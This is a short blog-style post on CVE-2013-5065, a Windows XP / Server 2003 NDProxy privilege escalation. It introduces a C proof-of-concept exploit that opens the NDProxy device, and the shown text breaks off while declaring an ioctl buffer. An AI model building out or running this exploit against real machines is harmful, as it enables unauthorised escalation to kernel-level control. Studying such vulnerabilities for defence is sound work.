NDProxy Privilege Escalation (CVE-2013-5065)

Introduction

In the last few days everyone has been raving about CVE-2013-5065, a new Windows XP / Server 2003 privilege escalation, well documented by FireEye. Googling around, we came across a Twitter message containing a link to a Chinese vulnerability analysis and PoC for CVE-2013-5065.

Exploit PoC:

#include <windows.h>
#include <stdio.h>

void main() {
    // Open a user-mode handle to the NDProxy device object (\\.\NDProxy)
    HANDLE hdev = CreateFile("\\\\.\\NDProxy", GENERIC_READ | GENERIC_WRITE,
                             FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
                             OPEN_EXISTING, 0, NULL);
    if (hdev == INVALID_HANDLE_VALUE) {
        printf("CreateFile Failed: %lu\n", GetLastError());
    }
    DWORD InBuf[0x15] = {0};   // input buffer for the subsequent DeviceIoControl call
    DWORD dwRetbytes…